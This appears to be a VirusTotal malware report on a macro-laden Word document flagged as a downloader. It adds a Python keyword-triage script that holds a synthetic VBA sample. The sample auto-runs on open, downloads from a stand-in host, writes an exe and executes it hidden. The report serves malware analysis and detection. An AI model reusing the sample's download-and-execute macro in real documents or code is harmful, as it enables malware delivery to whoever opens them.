SHA256: d2a4c536d271fb9a636c0e820787e428994cf58fe8cac988ef190fc94889a994
File name: 8e2f6ab95628fa0e3e8c7d61ec6659e0
Detection ratio: 37 / 57
Analysis date: 2016-06-03 14:10:00 UTC ( 9 months, 3 weeks ago )
Antivirus              Result                               Update
Ad-Aware               W97M.Downloader.QB                   20160603
AegisLab               Troj.Downloader.Vbs.Agent!c          20160603
AhnLab-V3              W97M/Downloader                      20160603
ALYac                  W97M.Downloader.QB                   20160603
Antiy-AVL              Trojan[Downloader]/VBS.Agent.amh     20160603
Arcabit                HEUR.VBA.Trojan.d                    20160603
Avast                  MO97:Downloader-TY [Trj]             20160603
AVG                    Script/PDF.Exploit.C                 20160603
Avira (no cloud)       W2000M/Agent.073338                  20160603
AVware                 LooksLike.Macro.Malware.gen!d5 (v)   20160603
Baidu                  VBA.Trojan-Downloader.Agent.do       20160603
BitDefender            W97M.Downloader.QB                   20160603
CAT-QuickHeal          W97M.Dropper.EY                      20160603
Cyren                  W97M/Downloader.CI                   20160603
DrWeb                  W97M.DownLoader.326                  20160603
Emsisoft               W97M.Downloader.QB (B)               20160603
ESET-NOD32             VBA/TrojanDownloader.Agent.PC        20160603
F-Prot                 W97M/Downloader.CI                   20160603
F-Secure               Trojan-Downloader:W97M/Dridex.R      20160603
Fortinet               WM/Agent.PC!tr                       20160603
GData                  W97M.Downloader.QB                   20160603
Ikarus                 Trojan-Downloader.VBA.Agent          20160603
Kaspersky              Trojan-Downloader.VBS.Agent.amh      20160603
McAfee                 W97M/Downloader.agm                  20160603
McAfee-GW-Edition      W97M/Downloader.agm                  20160603
Microsoft              TrojanDownloader:W97M/Adnel.D        20160603
eScan                  W97M.Downloader.QB                   20160603
NANO-Antivirus         Trojan.Script.Agent.druync           20160603
nProtect               W97M.Downloader.QB                   20160603
Panda                  W97M/Downloader                      20160603
Qihoo-360              heur.macro.download.g                20160603
Sophos                 Troj/DocDl-MJ                        20160603
Symantec               W97M.Downloader                      20160603
Tencent                Vbs.Trojan-downloader.Agent.Lork     20160603
TrendMicro             W2KM_DLOADR.JCZ                      20160603
TrendMicro-HouseCall   W2KM_DLOADR.JCZ                      20160603
VIPRE                  LooksLike.Macro.Malware.gen!d5 (v)   20160603
Alibaba                (no detection)                       20160603
Baidu-International    (no detection)                       20160603
Bkav                   (no detection)                       20160603
ClamAV                 (no detection)                       20160603
CMC                    (no detection)                       20160602
Comodo                 (no detection)                       20160603
Jiangmin               (no detection)                       20160603
K7AntiVirus            (no detection)                       20160603
K7GW                   (no detection)                       20160603
Kingsoft               (no detection)                       20160603
Malwarebytes           (no detection)                       20160603
Rising                 (no detection)                       20160603
SUPERAntiSpyware       (no detection)                       20160603
TheHacker              (no detection)                       20160602
TotalDefense           (no detection)                       20160603
VBA32                  (no detection)                       20160603
ViRobot                (no detection)                       20160603
Yandex                 (no detection)                       20160602
Zillya                 (no detection)                       20160603
Zoner                  (no detection)                       20160603
Most vendor names are generic (W97M/VBA macro downloader); only F-Secure attributes the sample to a family (Dridex), and Microsoft files it under its own Adnel downloader name.
The file is a Compound File Binary (OLE2 "Compound Document File") container; more specifically, it is a Microsoft Word (.doc) document.
Commonly abused properties
The file contains VBA macros. A macro is a stored sequence of commands that Word runs as a single unit, and in attacker-supplied documents that sequence is routinely used to fetch and run a payload as soon as the document is opened with macros enabled. Static inspection of the macro source flags the following capabilities (keyword matches on the code, not confirmed runtime behaviour):
May open a file.
May write to a file.
May perform operations with other files.
May create OLE objects.
May execute code from Dynamically Linked Libraries.
Seems to contain deobfuscation code.
Taken together with the zero word and character counts in the metadata further down, the document body is empty: the VBA project is the only meaningful content of this file.
Summary
last_author: GN
creation_datetime: 2015-04-24 10:17:00
template: Normal.dot
author: 1
page_count: 1
last_saved: 2015-04-24 10:17:00
revision_number: 2
application_name: Microsoft Office Word
code_page: Cyrillic
Document summary
line_count: 1
version: 730895
paragraph_count: 1
code_page: Cyrillic
OLE Streams
sid  name                             type    size   notes
0    Root Entry                       root    11264  clsid 00020906-0000-0000-c000-000000000046 (MS Word)
19   \x01CompObj                      stream  113
4    \x05DocumentSummaryInformation   stream  4096
3    \x05SummaryInformation           stream  4096
1    1Table                           stream  4124
18   Macros/PROJECT                   stream  740
17   Macros/PROJECTwm                 stream  182
14   Macros/VBA/AMOS                  stream  4340   macro
9    Macros/VBA/CLAY                  stream  6016   macro
11   Macros/VBA/CORNELIUS             stream  4960   macro
13   Macros/VBA/DEXTER                stream  3220   macro
12   Macros/VBA/LAMAR                 stream  5854   macro
8    Macros/VBA/PERCY                 stream  3706   macro
10   Macros/VBA/ROLANDO               stream  6529   macro
7    Macros/VBA/ThisDocument          stream  2095   macro
15   Macros/VBA/_VBA_PROJECT          stream  8176
16   Macros/VBA/dir                   stream  1062
2    WordDocument                     stream  4151
Macros and VBA code streams
[+] ThisDocument.cls Macros/VBA/ThisDocument 84 bytes
[+] PERCY.bas Macros/VBA/PERCY 665 bytes
exe-pattern create-ole open-file run-dll
[+] CLAY.bas Macros/VBA/CLAY 1301 bytes
exe-pattern run-dll
[+] ROLANDO.bas Macros/VBA/ROLANDO 1738 bytes
handle-file open-file write-file
[+] CORNELIUS.bas Macros/VBA/CORNELIUS 889 bytes
exe-pattern obfuscated run-dll
[+] LAMAR.bas Macros/VBA/LAMAR 1442 bytes
exe-pattern run-dll
[+] DEXTER.bas Macros/VBA/DEXTER 620 bytes
create-ole
[+] AMOS.bas Macros/VBA/AMOS 746 bytes
exe-pattern run-dll
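The tag lines above (exe-pattern, create-ole, open-file, run-dll, write-file, handle-file, obfuscated) come from keyword matching over the decompressed macro source of each module. The Python script below is an added illustration of that kind of triage and is not VirusTotal's or any vendor's code: it strips VBA comments, runs a small regex table per tag over each module, adds an obfuscation heuristic (Chr() call density, StrReverse, split string literals) and an auto-exec tag that this report does not use, and prints an olevba-style summary. The regexes, the two thresholds and the three sample modules are this example's own constructions; the sample is a synthetic downloader-shaped macro, not the code of this document, which the report does not reproduce.

```python
"""Keyword triage of extracted VBA modules, in the style of the tag lines above.

Added example, not VirusTotal's or any vendor's code. Tag names follow this
report plus one extra (auto-exec); the patterns, thresholds and sample modules
are this example's own assumptions, not the analysed document's macros.
"""
import re

# One tag fires when any of its patterns matches the comment-stripped source.
TAG_PATTERNS = {
    "exe-pattern": [r"\.exe\b"],
    # Declare ... Lib "dll": the macro calls exported DLL functions directly.
    "run-dll": [r"\bDeclare\b(?:\s+PtrSafe)?\s+(?:Function|Sub)\b.*\bLib\b"],
    "create-ole": [r"\bCreateObject\s*\(", r"\bGetObject\s*\("],
    "open-file": [r"\bOpen\b.+\bFor\s+(?:Binary|Input|Output|Append)\b",
                  r"\.OpenTextFile\s*\("],
    "write-file": [r"\b(?:Put|Print|Write)\s*#", r"\.SaveToFile\s*\(", r"\.WriteText\b"],
    "handle-file": [r"\bFreeFile\b", r"\bClose\s*#", r"\bKill\b"],
    # Not a tag on this report: entry points Word runs without a click.
    "auto-exec": [r"\b(?:AutoOpen|Document_Open|AutoExec|Workbook_Open)\b"],
}

CHR_CALL_THRESHOLD = 6   # assumption: this many Chr()/ChrW() calls per module is unusual
CONCAT_THRESHOLD = 5     # assumption: this many "ab" & "cd" joins signals split literals


def strip_comment(line):
    """Drop a trailing VBA comment (') that is not inside a string literal."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def looks_obfuscated(code):
    """Cheap obfuscation heuristic: Chr() density, StrReverse, or split literals."""
    chr_calls = len(re.findall(r"\bChr[WB]?\s*\(", code, re.I))
    literal_joins = len(re.findall(r'"\s*[&+]\s*"', code))
    return (chr_calls >= CHR_CALL_THRESHOLD
            or literal_joins >= CONCAT_THRESHOLD
            or re.search(r"\bStrReverse\s*\(", code, re.I) is not None)


def triage_vba(source):
    """Return the set of tags that fire on one module's source text."""
    code = "\n".join(strip_comment(line) for line in source.splitlines())
    tags = {tag for tag, patterns in TAG_PATTERNS.items()
            if any(re.search(p, code, re.I | re.M) for p in patterns)}
    if looks_obfuscated(code):
        tags.add("obfuscated")
    return tags


def triage_project(modules):
    """modules: {stream name: source}. Returns per-module sorted tags and their union."""
    per_module = {name: sorted(triage_vba(src)) for name, src in modules.items()}
    union = sorted(set().union(*per_module.values())) if per_module else []
    return per_module, union


# Constructed sample project: a downloader-shaped macro split across modules, the way
# the AMOS/CLAY/... modules of this report split theirs. Not this document's code.
SAMPLE_MODULES = {
    "Macros/VBA/ThisDocument": r'''
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Call Stage1  ' hand off to a standard module
End Sub
''',
    "Macros/VBA/Mod1": r'''
Attribute VB_Name = "Mod1"
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal a As Long, _
    ByVal u As String, ByVal f As String, ByVal r As Long, ByVal c As Long) As Long
Public Sub Stage1()
    Dim p As String
    p = Environ("TEMP") & "\" & Chr(117) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    URLDownloadToFileA 0, "http://example.invalid/x", p, 0, 0
    Shell p, vbHide
End Sub
''',
    "Macros/VBA/Mod2": r'''
Attribute VB_Name = "Mod2"
Public Sub Stage2(buf() As Byte)
    Dim h As Integer, f As String
    f = Environ("TEMP") & "\svc.exe"
    h = FreeFile
    Open f For Binary Access Write As #h
    Put #h, , buf
    Close #h
    Set o = CreateObject("WScript.Shell")
    o.Run f, 0
End Sub
''',
}

if __name__ == "__main__":
    per_module, union = triage_project(SAMPLE_MODULES)
    for name, tags in per_module.items():
        print(f"[+] {name}: {' '.join(tags) or '-'}")
    print("Tags:", " ".join(union))
```

Note how the sample's Mod1 builds its file name from Chr() calls, so exe-pattern does not fire on it while obfuscated does; the two flags are complementary, and a module that is tagged obfuscated but shows no API or file keywords should be decoded (olevba's --decode and --reveal options handle the common encodings) before it is judged harmless.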
ExifTool file metadata
SharedDoc: No
Author: 1
CodePage: Windows Cyrillic
LinksUpToDate: No
LastModifiedBy: GN
HeadingPairs: , 1
Template: Normal.dot
CharCountWithSpaces: 0
CreateDate: 2015:04:24 09:17:00
CompObjUserType: Документ Microsoft Office Word (the eight-character Cyrillic prefix, code page 1251, is shown as "????????" when the string is decoded as ASCII)
ModifyDate: 2015:04:24 09:17:00
HyperlinksChanged: No
Characters: 0
ScaleCrop: No
RevisionNumber: 2
MIMEType: application/msword
Words: 0
FileType: DOC
Lines: 1
AppVersion: 11.9999 (Word 2003)
Security: None
Software: Microsoft Office Word
TotalEditTime: 0
Pages: 1
CompObjUserTypeLen: 31
FileTypeExtension: doc
Paragraphs: 1

File identification
MD5 ab8401a01ac23ee85f768b50290dcb46
SHA1 115fe1409c72ba93060c564c9583929d9483324c
SHA256 d2a4c536d271fb9a636c0e820787e428994cf58fe8cac988ef190fc94889a994
ssdeep 768:9ZTQgKc5vlhV7hTSKL6mUtb2aTe4CHhGEwQzNqZVs:75KcNlkKLg2YGNU
File size 69.0 KB ( 70656 bytes )
File type MS Word Document
Magic literal CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 1, Template: Normal.dot, Last Saved By: GN, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 23 09:17:00 2015, Last Saved Time/Date: Thu Apr 23 09:17:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
Note that the same creation and last-saved timestamp is rendered three ways on this page (2015-04-24 10:17:00 in the summary listing, 2015:04:24 09:17:00 by ExifTool, Thu Apr 23 09:17:00 2015 by libmagic); for timeline work, read the raw FILETIME from the SummaryInformation stream rather than relying on any one tool's rendering.
TrID Microsoft Word document (80.0%)
Generic OLE2 / Multistream Compound File (20.0%)
Tags
obfuscated open-file exe-pattern handle-file doc macros run-dll write-file create-ole

VirusTotal metadata
First submission 2015-04-24 09:44:50 UTC ( 1 year, 11 months ago )
Last submission 2015-05-01 22:30:05 UTC ( 1 year, 10 months ago )
File names 8e2f6ab95628fa0e3e8c7d61ec6659e0
Western_Order.doc
a5209723483fdc082219fb49699b7171
Western Order.doc